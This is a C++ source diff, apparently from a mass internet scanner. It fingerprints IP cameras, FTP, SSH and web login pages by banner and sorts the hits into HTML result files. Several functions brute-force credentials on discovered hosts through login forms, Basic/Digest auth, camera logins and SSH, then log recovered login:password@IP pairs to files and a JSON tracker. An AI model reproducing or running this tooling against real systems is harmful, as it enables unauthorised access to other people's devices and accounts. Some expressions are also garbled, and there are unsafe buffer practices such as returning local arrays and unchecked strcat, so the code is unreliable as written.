strstr(buffcpy, "ieorforefox") != NULL + && strstr(buffcpy, "sofari") != NULL) return 49; //IEORFOREFOX + + if(((strstr(buffcpy, "220") != NULL) && (port == 21)) || + (strstr(buffcpy, "220 diskStation ftp server ready") != NULL) || + (strstr(buffcpy, "220 ftp server ready") != NULL) + || strstr(buffcpy, "500 'get': command not understood") != NULL + ) return 16; // 16 - FTP + + if(strstr(buffcpy, "camera web server") != NULL || strstr(buffcpy, "webcamxp 5") != NULL + || strstr(buffcpy, "ip box camera") != NULL || strstr(buffcpy, "snaff") != NULL + || strstr(buffcpy, "hfs /") != NULL || strstr(buffcpy, "httpfileserver") != NULL + || strstr(buffcpy, "network camera") != NULL + || strstr(buffcpy, "$lock extended") != NULL || strstr(buffcpy, "ip camera") != NULL + || strstr(buffcpy, "/viewer/video.jpg") != NULL || strstr(buffcpy, "smart ip device") != NULL + || strstr(buffcpy, "sanpshot_icon") != NULL || strstr(buffcpy, "snapshot_icon") != NULL + || strstr(buffcpy, "ipcam") != NULL + ) return 0; + + if(lxf.globalSearchNeg(buffcpy, ip, port) == -1) return -1; + if(globalSearchPrnt(buffcpy) == -1) return -1; + if(strstr(buffcpy, " 500 && sz <= 3500) || sz > 180000) + { + res = _mainFinderFirst(lBuff, 0, port, ip); + } + else if(sz > 3500 && sz <= 180000) + { + res = _mainFinderSecond(lBuff, port, ip); + }; + delete []lBuff; + return res; + } + else return -1; +}; +void fillGlobalLogData(char *ip, char *hostname, char *port, const char *sz, char *title, char *login, char *pass, char *comment, char *cdpg, char *clss) +{ + if(trackerOK == true) + { + while(gGlobalTrackLocked == true) Sleep(10); + gGlobalTrackLocked = true; + + QJsonObject jsonData; + + if(gMode == 0 || gMode == -1) + { + if(strlen(ip) > 0) jsonData.insert("ip_addr", QJsonValue(QString(ip)) ); + else jsonData.insert("ip_addr", QJsonValue(QString("")) ); + + jsonData.insert("hostname", QJsonValue(QString(hostname)) ); + } + else + { + jsonData.insert("ip_addr", QJsonValue(QString("")) ); + jsonData.insert("hostname", QJsonValue(QString(ip)) ); + }; + + jsonData.insert("port", QJsonValue(QString(port).replace(":", "")) ); + jsonData.insert("recv", QJsonValue(QString(sz)) ); + QString tt = QString(base64_encode((const unsigned char *)title, strlen(title)).c_str()); + if(strlen(title) == 0) jsonData.insert("title", QJsonValue(QString("NULL")) ); + else jsonData.insert("title", QJsonValue(QString(base64_encode((const unsigned char *)title, strlen(title)).c_str())) ); + if(strlen(login) > 0) jsonData.insert("login", QJsonValue(QString(login)) ); + else jsonData.insert("login", QJsonValue(QString("")) ); + if(strlen(pass) > 0) jsonData.insert("pass", QJsonValue(QString(pass)) ); + else jsonData.insert("pass", QJsonValue(QString("")) ); + if(strlen(comment) > 0) jsonData.insert("other", QJsonValue(QString(comment)) ); + else jsonData.insert("other", QJsonValue(QString("")) ); + if(strlen(cdpg) > 0) jsonData.insert("encoding", QJsonValue(QString(cdpg)) ); + else jsonData.insert("encoding", QJsonValue(QString("")) ); + if(strlen(clss) > 0) jsonData.insert("Class", QJsonValue(QString(clss)) ); + else jsonData.insert("Class", QJsonValue(QString("")) ); + + while(jsonArr == NULL); + jsonArr->push_front(jsonData); + + gGlobalTrackLocked = false; + }; +}; +int __checkFileExistence(int flag) +{ + char fileName[64] = {0}; + + if(flag == 666 || flag == 350) strcpy(fileName, "./result_files/STRANGE_ERROR.html"); + else if(flag == -22) strcpy(fileName, "./result_files/ssh.html"); + else if(flag == 0 || flag == 15 || flag == -10) strcpy(fileName, "./result_files/strange.html"); + else if(flag == 3) strcpy(fileName, "./result_files/other.html"); + else if(flag == 7) strcpy(fileName, "./result_files/low_loads.html"); + else if(flag == 10) strcpy(fileName, "./result_files/LoginForms.html"); + else if(flag == 16) strcpy(fileName, "./result_files/FTP.html"); + else if(flag >= 17 || flag == 11 || flag == 12 + || flag == 13 || flag == 14 || flag == 1) strcpy(fileName, "./result_files/Basicauth.html"); + + FILE *f = fopen(fileName, "r"); + if(f == NULL) return true; + else + { + fclose(f); + return false; + }; +}; + +bool ftsAnom = true; +bool ftsOther = true; +bool ftsSSH = true; +bool ftsLL = true; +bool ftsFTP = true; +bool ftsBA = true; +bool ftsLF = true; + +bool fOpened = false; +char styleBuff[1024] = {""}; +char topBuff[1024] = {"
.strange .other .BasicAuth .FTP .LowLoads .loginforms .SSH


"}; +void fputsf(char *ip, char *port, char *text, int flag, char *msg) +{ + FILE *file = NULL; + bool firstTimeYeah = false; +#pragma region FileExistenceCheck + if(flag == 0 || flag == 15 || flag == -10) + { + if(ftsAnom) ftsAnom = __checkFileExistence(flag); + file = fopen("./result_files/strange.html", "a"); + } + else if(flag == 3) + { + if(ftsOther) ftsOther = __checkFileExistence(flag); + file = fopen("./result_files/other.html", "a"); + } + else if(flag == -22) + { + if(ftsSSH) ftsSSH = __checkFileExistence(flag); + file = fopen("./result_files/SSH.html", "a"); + } + else if(flag == 7) + { + if(ftsLL) ftsLL = __checkFileExistence(flag); + file = fopen("./result_files/low_loads.html", "a"); + } + else if(flag == 10) + { + if(ftsLF) ftsLF = __checkFileExistence(flag); + file = fopen("./result_files/LoginForms.html", "a"); + } + else if(flag == 16) + { + if(ftsFTP) ftsFTP = __checkFileExistence(flag); + file = fopen("./result_files/FTP.html", "a"); + } + else if(flag >= 17 || flag == 11 || flag == 12 + || flag == 13 || flag == 14 || flag == 1 + ) + { + if(ftsBA) ftsBA = __checkFileExistence(flag); + file = fopen("./result_files/Basicauth.html", "a"); + } + else + { + stt->doEmitionRedFoundData("[WUT!?] Unknown flag [FLAG: " + QString::number(flag) + "]"); + }; +#pragma endregion + if(file != NULL) + { + time_t rtime; + time(&rtime); + if(horLineFlag == false) + { + horLineFlag = true; + char delimiter[128] = {0}; + char cdate[32] = {0}; + strcpy (cdate, "["); + strcat (cdate, ctime (&rtime)); + memset (cdate + strlen(cdate) - 1, '\0', 1); + strcat (cdate, "] "); + strcpy(delimiter, "
"); + strcat(delimiter, cdate); + strcat(delimiter, "
"); + fputs (delimiter, file); + }; + ++saved; + char *string = new char[strlen(text) + 512]; + if(flag != -22) + { + strcpy (string, "
"); + + char cdate[32] = {0}; + strcat (cdate, "["); + strcat (cdate, ctime (&rtime)); + memset (cdate + strlen(cdate) - 1, '\0', 1); + strcat (cdate, "] "); + strcat (string, cdate); + strcat (string, text); + strcat (string, "
"); + } + else + { + strcpy (string, "
"); + + char cdate[32] = {0}; + strcat (cdate, "["); + strcat (cdate, ctime (&rtime)); + memset (cdate + strlen(cdate) - 1, '\0', 1); + strcat (cdate, "] "); + strcat (string, cdate); + strcat (string, text); + strcat (string, "
"); + }; + +#pragma region styleFiller + if(flag == 0 && ftsAnom) + { + char tmsg[1024] = {0}; + ftsAnom = false; + strcpy(tmsg, "Anomalies"); + strcat(tmsg, msg); + strcat(tmsg, styleBuff); + fputs (tmsg, file); + fputs ("
.strange .other .BasicAuth .FTP .LowLoads .loginforms .SSH


", file); + }; + if(flag == 3 && ftsOther) + { + char tmsg[1024] = {0}; + ftsOther = false; + strcpy(tmsg, "Suspicious"); + strcat(tmsg, msg); + strcat(tmsg, styleBuff); + fputs (tmsg, file); + fputs (topBuff, file); + }; + if(flag == -22 && ftsSSH) + { + char tmsg[1024] = {0}; + ftsOther = false; + strcpy(tmsg, "SSH"); + strcat(tmsg, msg); + strcat(tmsg, styleBuff); + fputs (tmsg, file); + fputs (topBuff, file); + }; + if(flag == 7 && ftsLL) + { + char tmsg[1024] = {0}; + ftsLL = false; + strcpy(tmsg, "Lowloads"); + strcat(tmsg, msg); + strcat(tmsg, styleBuff); + fputs (tmsg, file); + fputs (topBuff, file); + }; + if(flag == 16 && ftsFTP) + { + char tmsg[1024] = {0}; + ftsFTP = false; + strcpy(tmsg, "FTP"); + strcat(tmsg, msg); + strcat(tmsg, styleBuff); + fputs (tmsg, file); + fputs (topBuff, file); + }; + if(flag == 10 && ftsLF) + { + char tmsg[1024] = {0}; + ftsLF = false; + strcpy(tmsg, "LoginsForms"); + strcat(tmsg, msg); + strcat(tmsg, styleBuff); + fputs (tmsg, file); + fputs (topBuff, file); + + }; + if((flag >= 17 || flag == 11 || flag == 12 || flag == 13 || flag == 14 || flag == 1) && ftsBA) + { + char tmsg[1024] = {0}; + ftsBA = false; + strcpy(tmsg, "BasicAuth"); + strcat(tmsg, msg); + strcat(tmsg, styleBuff); + fputs (tmsg, file); + fputs (topBuff, file); + }; + +#pragma endregion + int innerCounter = 0; + while(fOpened) + { + if(innerCounter > 20) + { + stt->doEmitionRedFoundData("\"fOpened\" loop detected!"); + break; + }; + ++innerCounter; + Sleep((rand() % 300 + 60)); + }; + fOpened = true; + fputs (string, file); + fclose (file); + fOpened = false; + + delete []string; + } + else + { + stt->doEmitionRedFoundData("Cannot open file [FLAG: " + QString::number(flag) + "]"); + }; +}; +void putInFile(int flag, char *ip, char *port, int recd, char *finalstr, char *hl, char *cp) +{ + char log[4096] = {0}, msg[512] = {0}; + + if(flag == 0 || flag == 15 || flag == -10) strcpy(msg, "[A]:"); + else if(flag == 3) strcpy(msg, "[S]:"); + else if(flag == 7) strcpy(msg, "[LL]:"); + else if(flag == 2) strcpy(msg, "[P]:"); + else if(flag == 666 || flag == 350) strcpy(msg, "[Strange Error]:"); + else if(flag == 10) strcpy(msg, "[LF]:"); + + QTextCodec *codec; + strcat(msg, ""); + strcat(msg, ip); + strcat(msg, ":"); + strcat(msg, port); + strcat(msg, ""); + + QString resMes(msg); + QString strf; + if(strstri(cp, "shift_jis") != NULL) + { + codec = QTextCodec::codecForName("Shift-JIS"); + strf = codec->toUnicode(finalstr); + } + else if(strstri(cp, "utf") != NULL) + { + codec = QTextCodec::codecForName("UTF-8"); + strf = codec->toUnicode(finalstr); + } + else if(strstri(cp, "cp") != NULL || strstri(cp, "windows") != NULL) + { + codec = QTextCodec::codecForName("Windows-1251"); + strf = codec->toUnicode(finalstr); + } + else strf = QString(finalstr); + if(flag != 6 && flag != 5 && flag != 4 && flag != 666 && flag != 350) + { + strcat(msg, " : "); + int sz = strf.size(); + strncat(msg, QString::fromLocal8Bit(finalstr).toHtmlEscaped().toLocal8Bit().data(), (sz < 128 ? sz : 128)); + strcat(msg, ""); + resMes += " : " + strf.toHtmlEscaped() + ""; + }; +#pragma region QTGUI_Area + stt->doEmitionFoundData(resMes); +#pragma endregion + + + strcpy(log, ""); + strcat(log, hl); + strcat(log, ""); + int flr = 40 - strlen(hl); + if(flr > 0) + { + while(flr != 0) + { + strcat(log, " "); + --flr; + }; + } + else strcat(log, " "); + strcat(log, ""); + strcat(log, ip); + strcat(log, ":"); + strcat(log, port); + strcat(log, "; Received: "); + strcat(log, std::to_string(recd).c_str()); + strcat(log, ""); + + if(flag == 666 || flag == 350) + { + fillGlobalLogData(ip, hl, port, std::to_string(recd).c_str(), finalstr, "", "", "", cp, "Strange error"); + ++PieAnomC1; + ++AnomC1; + } + else if(flag == 0 || flag == 15 || flag == -10) + { + fillGlobalLogData(ip, hl, port, std::to_string(recd).c_str(), finalstr, "", "", "", cp, "Anomaly"); + ++PieAnomC1; + ++AnomC1; + } + else if(flag == 3) + { + fillGlobalLogData(ip, hl, port, std::to_string(recd).c_str(), finalstr, "", "", "", cp, "Suspicious"); + ++PieSusp; + ++Susp; + } + else if(flag == 7) + { + fillGlobalLogData(ip, hl, port, std::to_string(recd).c_str(), finalstr, "", "", "", cp, "Low load"); + ++PieLowl; + } + else if(flag == 10) + { + fillGlobalLogData(ip, hl, port, std::to_string(recd).c_str(), finalstr, "", "", "", cp, "Login form"); + ++PieWF; + }; + + if(flag != 6 && flag != 5 && flag != 4) + { + strcat(log, "; T: "); + + strncat(log, QString::fromLocal8Bit(finalstr).toHtmlEscaped().toLocal8Bit().data(), 100); + strcat(log, ""); + }; + strcat(log, "\n"); + + fputsf (ip, port, log, flag, msg); + + ZeroMemory(msg, strlen(msg)); +}; +void _specFillerBA(char *hl, char *ip, char *port, char *finalstr, char *login, char *pass, int flag) +{ + char log[512] = {0}; + + ++PieBA; + + strcpy(log, "[BA]:"); + strcat(log, ""); + if(strcmp(login, "NULL") != 0 && strcmp(pass, "NULL") != 0) { + strcat(log, login); + strcat(log, ":"); + strcat(log, pass); + strcat(log, "@"); + } + strcat(log, ip); + strcat(log, port); + strcat(log, " T: "); + strcat(log, finalstr); + strcat(log, ""); + strcat(log, "\n"); +#pragma region QTGUI_Area + stt->doEmitionFoundData(QString::fromLocal8Bit(log)); +#pragma endregion + fputsf (ip, port, log , flag, "Basic Authorization"); +}; +void _specFillerWF(char *hl, char *ip, char *port, char *finalstr, char *login, char *pass, int flag) +{ + char log[512] = {0}; + + ++PieWF; + + strcpy(log, "[WF]:"); + strcat(log, ""); + strcat(log, ip); + strcat(log, ":"); + strcat(log, port); + strcat(log, " T: "); + strcat(log, finalstr); + strcat(log, " Pass: "); + strcat(log, login); + strcat(log, ":"); + strcat(log, pass); + strcat(log, ""); + strcat(log, "\n"); +#pragma region QTGUI_Area + stt->doEmitionFoundData(QString::fromLocal8Bit(log)); +#pragma endregion + fputsf (ip, port, log , flag, "Web Form"); +}; +void _getFormVal(char *data, char *result, char *key, char *path = NULL) +{ + char parVal[256] = {0}; + int psz = 0; + char *pkeyResult1 = strstr(data, ">"); + if(pkeyResult1 != NULL) + { + psz = pkeyResult1 - data + 1; + strncpy(parVal, data, (psz < 256 ? psz : 256)); + } + else + { + strncpy(parVal, data, 256); + }; + int sz = 0; + char parVal2[256] = {0}; + + char startPath[256] = {0}; + if(strcmp(key, "action") == 0) + { + if(strstr(path, "./") == NULL) + { + char *ptrP1 = _findLast(path, "/"); + if(ptrP1 != path) + { + int pSz = ptrP1 -path; + strncpy(startPath, path, pSz); + }; + }; + }; + char *keyResult1 = strstri(parVal, key); + if(keyResult1 != NULL) + { + char *pkeyResult2 = _findFirst(keyResult1, " >"); + if(pkeyResult2 != NULL) + { + int psz2 = pkeyResult2 - keyResult1; + strncpy(parVal2, keyResult1, (psz2 < 256 ? psz2 : 256)); + + char *keyResult2 = _findFirst(parVal2, "'\""); + if(keyResult2 != NULL) + { + char *keyResult3 = _findFirst(keyResult2 + 1, "'\"> "); + if(keyResult3 != NULL) + { + sz = keyResult3 - keyResult2 - 1; + char tempRes[256] = {0}; + if(strstr(keyResult2, "./") != NULL) + { + strcpy(result, startPath); + strncpy(tempRes, keyResult2 + 2, sz - 1); + if(tempRes[0] != '/') strcat(result, "/"); + strcat(result, tempRes); + } + else if(strstr(keyResult2, "/") == NULL) + { + if(strcmp(key, "action") == 0) + { + strcpy(result, startPath); + strncpy(tempRes, keyResult2 + 1, sz); + if(tempRes[0] != '/') strcat(result, "/"); + strcat(result, tempRes); + } + else + { + strncpy(result, keyResult2 + 1, sz); + }; + } + else + { + strncpy(result, keyResult2 + 1, sz); + }; + }; + } + else + { + keyResult2 = _findFirst(parVal2, "="); + if(keyResult2 != NULL) + { + char *keyResult3 = _findFirst(keyResult2, "'\"> "); + if(keyResult3 != NULL ) + { + sz = keyResult3 - keyResult2 - 1; + strncpy(result, keyResult2 + 1, sz); + char tempRes[256] = {0}; + if(strstr(keyResult2, "./") != NULL) + { + strcpy(result, startPath); + strncpy(tempRes, keyResult2 + 2, sz - 1); + if(tempRes[0] != '/') strcat(result, "/"); + strcat(result, tempRes); + } + else if(strstr(keyResult2, "/") == NULL) + { + if(strcmp(key, "action") == 0) + { + strcpy(result, startPath); + strncpy(tempRes, keyResult2 + 1, sz); + if(tempRes[0] != '/') strcat(result, "/"); + strcat(result, tempRes); + } + else + { + strncpy(result, keyResult2 + 1, sz); + }; + } + else + { + strncpy(result, keyResult2 + 1, sz); + }; + } + else + { + strcpy(result, startPath); + strcat(result, keyResult2 + 1); + }; + } + }; + + } + else + { + stt->doEmitionFoundData("[WF]: GetParam - Cannot retrieve field."); + }; + }; +}; + +static const std::string arrUser[] = {"user", "usr", "username", "login", "lgn", "account", "acc", "param1", "param3", "id", "A1", "uname", "mail", "name"}; +std::vector vecUser (arrUser, arrUser + sizeof(arrUser) / sizeof(arrUser[0]) ); +static const std::string arrPass[] = {"pass", "pw", "password", "code", "param2", "param4", "secret", "login_p", "A2", "admin_pw", "pws", "secretkey"}; +std::vector vecPass (arrPass, arrPass + sizeof(arrPass) / sizeof(arrPass[0]) ); + +char *_getAttribute(char *str, char *attrib) +{ + if(strstri(str, attrib) != NULL) + { + char res[1024] = {0}; + char *ptrStart = strstri(str, attrib); + char *ptrEnd = _findFirst(ptrStart, "\r\n"); + if(ptrEnd != NULL) + { + int szAt = strlen(attrib); + int sz = ptrEnd - ptrStart - szAt; + + if(sz != 0 && sz < 1024) strncpy(res, ptrStart + szAt, sz); + else return ""; + + return res; + } + else return ""; + } + else return ""; +}; +void _getInputVal(std::vector inputVec, char *buff, char *key) +{ + char *pos = NULL; + char field[256] = {0}; + if(strcmp(key, "USER") == 0) + { + for(int i = 0; i < inputVec.size(); ++i) + { + ZeroMemory(field, 256); + _getFormVal((char*)inputVec[i].data(), field, "name="); + for(int j = 0; j < vecUser.size(); ++j) + { + pos = strstri(field, vecUser[j].data()); + if(pos != NULL) + { + strncpy(buff, field, 256); + return; + }; + }; + }; + } + else + { + for(int i = 0; i < inputVec.size(); ++i) + { + ZeroMemory(field, 256); + _getFormVal((char*)inputVec[i].data(), field, "name="); + for(int j = 0; j < vecPass.size(); ++j) + { + pos = strstri(field, vecPass[j].data()); + if(pos != NULL) + { + strncpy(buff, field, 256); + return; + }; + }; + }; + }; +}; +void _specWFBrute(char *ip, int port, char *hl, char *buff, int flag, char *path, char *comment, char *tclass, char *cp, int recd, char *title) +{ + char cookie[1024] = {0}; + + if(strstr(buff, "VER_CODE") != NULL || strstri(buff, "captcha") != NULL) + { + if(gNegDebugMode) + { + stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + "" + "] Ignoring: Captcha detected."); + }; + return; + }; + isActive = 1; + + char b[16] = {0}; + char methodVal[128] = {0}; + char actionVal[512] = {0}; + char userVal[128] = {0}; + char passVal[128] = {0}; + char frmBlock[4096] = {0}; + char *fBlock = strstri(buff, " inputVec; + if(fBlock != NULL) + { + char *fBlock2 = strstri(fBlock, ">"); + int szfb2 = fBlock2 - fBlock; + strncpy(formVal, fBlock, (szfb2 < 128 ? szfb2 : 128)); + char *frmBlockEnd = strstri(fBlock, ""); + if(frmBlockEnd != NULL) + { + fbsz = frmBlockEnd - fBlock; + strncpy(frmBlock, fBlock, (fbsz < 4096 ? fbsz : 4096)); + } + else + { + strncpy(frmBlock, fBlock, 4096); + }; + + _getFormVal(frmBlock, methodVal, "method"); + _getFormVal(frmBlock, actionVal, "action", path); + if(actionVal[0] == '.') + { + char tmpBuff[512] = {0}; + char *tempPtr1 = _findLast(path, "/"); + int sz = tempPtr1 - path; + if(sz > 0) + { + strncpy(tmpBuff, path, sz); + strncat(tmpBuff, actionVal + 1, strlen(actionVal) - 1); + ZeroMemory(actionVal, sizeof(actionVal)); + strcpy(actionVal, tmpBuff); + }; + }; + + char *inptPtr1 = strstri(frmBlock, ""); + if(inptPtrEnd != NULL) + { + ZeroMemory(tempInptStr, 256); + insz = inptPtrEnd - inptPtr1 + 1; + strncpy(tempInptStr, inptPtr1, (insz < 256 ? insz : 256)); + inputVec.push_back(std::string(tempInptStr)); + inptPtr1 = strstri(inptPtrEnd, "doEmitionFoundData("" + QString(ip) + ":" + QString::number(port) + " - [WF]: No text/password fields found."); + ///fillGlobalLogData(ip, hl, tport, std::to_string(recd).c_str(), title, "NULL", "NULL", comment, cp, tclass); + ///putInFile(flag, ip, tport, recd, title, hl, cp); + }; + } + else + { + stt->doEmitionFoundData("" + QString(ip) + ":" + QString::number(port) + " - [WF]: Cannot find form block."); + fillGlobalLogData(ip, hl, tport, std::to_string(recd).c_str(), title, "NULL", "NULL", comment, cp, tclass); + putInFile(flag, ip, tport, recd, title, hl, cp); + }; + + if(strlen(methodVal) == 0) + { + strcpy(methodVal, "GET"); + }; + if(strlen(actionVal) == 0) + { + strcpy(actionVal, "/"); + } + else + { + if(strstri(actionVal, "http") != NULL) + { + char tmp[128] = {0}; + strncpy(tmp, actionVal, 128); + if(strstr(tmp, "//") != NULL) + { + char *tmp1 = strstr(tmp, "//"); + char *tmp2 = strstr(tmp1 + 2, "/"); + ZeroMemory(actionVal, 128); + if(tmp2 != NULL) + { + strncpy(actionVal, tmp2, strlen(tmp2)); + } + else + { + strcpy(actionVal, "/"); + }; + } + else if(strstr(tmp, "%2f%2f") != NULL) + { + char *tmp1 = strstr(tmp, "%2f%2f"); + char *tmp2 = strstr(tmp1 + 6, "%2f"); + ZeroMemory(actionVal, 128); + if(tmp2 != NULL) + { + strcpy(actionVal, "/"); + strncpy(actionVal, tmp2 + 3, strlen(tmp2) - 3); + } + else + { + strcpy(actionVal, "/"); + }; + }; + }; + if(actionVal[0] != '/') + { + char temp[128] = {0}; + strncpy(temp, actionVal, 128); + strcpy(actionVal, "/"); + strncat(actionVal, temp, strlen(temp)); + }; + }; + + if(inputVec.size() > 0) + { + if(strlen(userVal) != 0 && strlen(passVal) != 0) + { + Connector con; + lopaStr lps = con._WFLobby(cookie, ip, port, methodVal, actionVal, userVal, passVal, formVal); + + if(strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0) + { + _specFillerWF(hl, ip, tport, title, lps.login, lps.pass, flag); + + fillGlobalLogData(ip, hl, tport, std::to_string(recd).c_str(), title, lps.login, lps.pass, comment, cp, tclass); + putInFile(flag, ip, tport, recd, title, hl, cp); + }; + } + else + { + if(gNegDebugMode) stt->doEmitionFoundData("" + QString(ip) + ":" + QString::number(port) + " - [WF]: Cannot find user/pass field."); + ///fillGlobalLogData(ip, hl, tport, std::to_string(recd).c_str(), title, "", "", "UnknownWebform", cp, tclass); + ///putInFile(flag, ip, tport, recd, title, hl, cp); + }; + }; + isActive = 0; +}; + +void _specWEBIPCAMBrute(char *ip, int port, char *hl, char *finalstr, int flag, char *comment, char *tclass, char *cp, int recd, char *SPEC) +{ + lopaStr lps; + ZeroMemory(lps.login, sizeof(lps.login)); + ZeroMemory(lps.pass, sizeof(lps.pass)); + ZeroMemory(lps.other, sizeof(lps.other)); + char tport[32] = {0}; + char b[16] = {0}; + strcpy(tport, ":"); + strcat(tport, itoa(port, b, 10)); + Connector con; + lps = con._IPCameraBLobby(ip, port, SPEC); + + if(strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0) + { + _specFillerBA(hl, ip, tport, finalstr, lps.login, lps.pass, flag); + + fillGlobalLogData(ip, hl, tport, std::to_string(recd).c_str(), finalstr, lps.login, lps.pass, comment, cp, "Basic Authorization"); + }; +}; +void _specBrute(char *cookie, char *ip, int port, char *hl, char *finalstr, int flag, char *path, char *comment, char *tclass, char *cp, int recd, char *data) +{ + isActive = 1; + lopaStr lps; + ZeroMemory(lps.login, sizeof(lps.login)); + ZeroMemory(lps.pass, sizeof(lps.pass)); + ZeroMemory(lps.other, sizeof(lps.other)); + char temp[64] = {0}; + char tport[32] = {0}; + char b[16] = {0}; + strcpy(tport, ":"); + strcat(tport, itoa(port, b, 10)); + Connector con; + + if(strcmp(comment, "[DIGEST]") == 0) lps = con._BALobby(cookie, ip, port, path, "[DIGEST]", data); + else lps = con._BALobby(cookie, ip, port, path, "[NORMAL]", ""); + + if(strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0) + { + _specFillerBA(hl, ip, tport, finalstr, lps.login, lps.pass, flag); + + fillGlobalLogData(ip, hl, tport, std::to_string(recd).c_str(), finalstr, lps.login, lps.pass, comment, cp, "Basic Authorization"); + }; + + ZeroMemory(temp, sizeof(temp)); +}; +const char *GetTitle(char* str) +{ + char delimiterT[] = ""; + char delimiterT2[] = "<title id=\"title\">"; + char *firstStr, *secondStr, finalstr[512] = {0}; + + if (strstri(str, "realm") != NULL) + { + if (strstr(str, "\"") != NULL) + { + int hm; + firstStr = strstr(str, "\""); + if(strstr((firstStr+1), "\"") != NULL) + { + secondStr = strstr((firstStr+1), "\""); + hm = (int)(secondStr-firstStr); + } + else hm = 10; + if(hm > 127) hm = 20; + strncat(finalstr, firstStr, hm+1); + }; + }; + + if(strlen(finalstr) != 0) strcat(finalstr, "::"); + + if(strstri(str, "<card") != NULL) + { + char *str1 = strstri(str, "<card"); + if(strstri(str1, "title=") != NULL) + { + char *str2 = strstri(str1, "title="); + if(strstri(str2, ">") != NULL) + { + char *str3 = strstri(str2, ">"); + + int y = str3 - str2; + if(y > 256) + { + strcpy(finalstr, "[Strange title]"); + } + else + { + strncat(finalstr, (char*)(str2 + strlen("title=")), y); + strcat(finalstr, " += "); + }; + }; + }; + }; + + if(strstri(str, "<title>") != NULL) + { + if(strstri(str, "<title>") != NULL) firstStr = strstri(str, "<title>"); + if(strstri(firstStr, "") != NULL) secondStr = strstri(firstStr, ""); + else + { + strcat(finalstr, "[Corrupted title]"); + return finalstr; + }; + int hm = (int)(secondStr - firstStr); + if(hm > 256) hm = 20; + strncat(finalstr, firstStr + 7, hm - 7); + + if(strstri(finalstr, "index of /") != NULL) + { + int hm = 0; + strcat(finalstr, " ("); + if(strstri(firstStr, "description") != NULL) firstStr = strstri(firstStr, "description"); + if(strstri(firstStr, "") != NULL && strlen(finalstr) < 480) + { + if(iterCount++ > 4 || strlen(finalstr) > 300) break; + if(strstr(firstStr, "\">") != NULL) firstStr = strstr(firstStr, "\">"); + else break; + secondStr = strstri(firstStr, ""); + + hm = (int)(secondStr-firstStr); + if(hm > 16) hm = 16; + + strncat(finalstr, firstStr + 2, hm - 2); + strcat(finalstr, " "); + if(strstri(firstStr, "") != NULL) secondStr = strstri(firstStr, ""); + else + { + strcpy(finalstr, "[Corrupted title]"); + return finalstr; + }; + int hm = (int)(secondStr-firstStr); + if(hm > 127) hm = 30; + strncat(finalstr, firstStr+18, hm-18); + } + else if(strstri(str, delimiterT) != NULL) + { + firstStr = strstri(str, delimiterT); + if(strstri(firstStr, "") != NULL) secondStr = strstri(firstStr, ""); + int hm = (int)(secondStr-firstStr); + if(hm > 127) hm = 30; + strncat(finalstr, firstStr+20, hm-20); + }; + + return finalstr; +}; +void _saveSSH(char *ip, int port, int recd, char *buffcpy) +{ + if(buffcpy != NULL) + { + char b[16] = {0}; + char log[2048] = {0}; + char logEmit[2048] = {0}; + char goodStr[256] = {0}; + char banner[256] = {0}; + + char *ptr1 = strstr(buffcpy, "|+|"); + if(ptr1 != NULL) + { + int gsz = ptr1 - buffcpy; + strncpy(goodStr, buffcpy, gsz); + if(strlen(ptr1 + 3) > 0) strcpy(banner, ptr1 + 3); + strcpy(logEmit, "[SSH] "); + strcpy(log, "[SSH] "); + strcat(log, goodStr); + strcat(log, ":"); + strcat(log, itoa(port, b, 10)); + strcat(log, ""); + strcat(log, "; Banner: "); + strcat(log, banner); + strcat(log, ""); + + ++PieSSH; + strcat(logEmit, ""); + strcat(logEmit, goodStr); + strcat(logEmit, ":"); + strcat(logEmit, itoa(port, b, 10)); + strcat(logEmit, ""); + + fputsf (ip, itoa(port, b, 10), log, -22, "SSH"); + char loginSSH[128] = {0}; + char passSSH[128] = {0}; + char *ptrl1 = strstr(buffcpy, ":"); + int lpsz = ptrl1 - buffcpy; + strncpy(loginSSH, buffcpy, lpsz); + char *ptrl2 = strstr(buffcpy, "@"); + lpsz = ptrl2 - ptrl1; + strncpy(passSSH, ptrl1 + 1, lpsz); + fillGlobalLogData(ip, "", itoa(port, b, 10), std::to_string(recd).c_str(), "[SSH service]", loginSSH, passSSH, "NULL", "UTF-8", "SSH"); + stt->doEmitionFoundData(QString::fromLocal8Bit(logEmit)); + } + else + { + stt->doEmitionRedFoundData("[_saveSSH] Wrong format! [" + QString(ip) + ":" + QString::number(port) + "]"); + }; + } + else + { + stt->doEmitionRedFoundData("[_saveSSH] Empty buffer! [" + QString(ip) + ":" + QString::number(port) + "]"); + }; +}; +int Lexems::_filler(int p, char* buffcpy, char* ip, int recd, Lexems *lx, char *hl) +{ + char b[16] = {0}; + + if( strstr(buffcpy, "[IGNR_ADDR]") != NULL ) return -1; + if( strstr(buffcpy, "SSH-2.0-OpenSSH") != NULL || strstr(buffcpy, "SSH-2.0-mod_sftp") != NULL) + { + Connector con; + conSTR CSTR; + CSTR.lowerBuff = NULL; + CSTR.size = 0; + int res = con._SSHLobby(ip, p, &CSTR); + if(res != -1 && res != -2) + { + _saveSSH(ip, p, recd, CSTR.lowerBuff); + }; + return -1; + }; + + if(p == 22) + { + _saveSSH(ip, p, recd, buffcpy); + return -1; + }; + + lopaStr lps; + ZeroMemory(lps.login, sizeof(lps.login)); + ZeroMemory(lps.pass, sizeof(lps.pass)); + ZeroMemory(lps.other, sizeof(lps.other)); + + PathStr ps; + ps.port = p; + strcpy(ps.ip, ip); + ZeroMemory(ps.headr, sizeof(ps.headr)); + ZeroMemory(ps.path, sizeof(ps.path)); + + char finalstr[TITLE_MAX_SIZE] = {0}; + char port[32] = {0}; + int flag = 0; + char cp[32] = {0}; + + strcpy(cp, GetCodePage(buffcpy)); + flag = ContentFilter(buffcpy, p, ip, cp); + if(flag == -1 ) return -1; + + strcpy(ps.headr, GetTitle(buffcpy)); + ps.flag = flag; + + char pps[256] = {0}; + strcpy(pps, "/"); + + std::vector redirStrLst; + char rBuff[65536] = {0}; + strncpy(rBuff, buffcpy, 65535); + if(flag == 0 || flag == 3 || flag == 7 ) + { + int rh = _header(ip, p, buffcpy, lx, &ps, &redirStrLst, rBuff); + strcpy(cp, ps.codepage); + if (rh == -1) return -1; + if(rh <= -2) + { + flag = ps.flag; + strcat(finalstr, ps.headr); + p = ps.port; + strcpy(ip, ps.ip); + }; + + int sz = strlen(ps.path); + strncpy(pps, ps.path, (sz < 256 ? sz : 256)); + } + else + { + if(strstr(buffcpy, 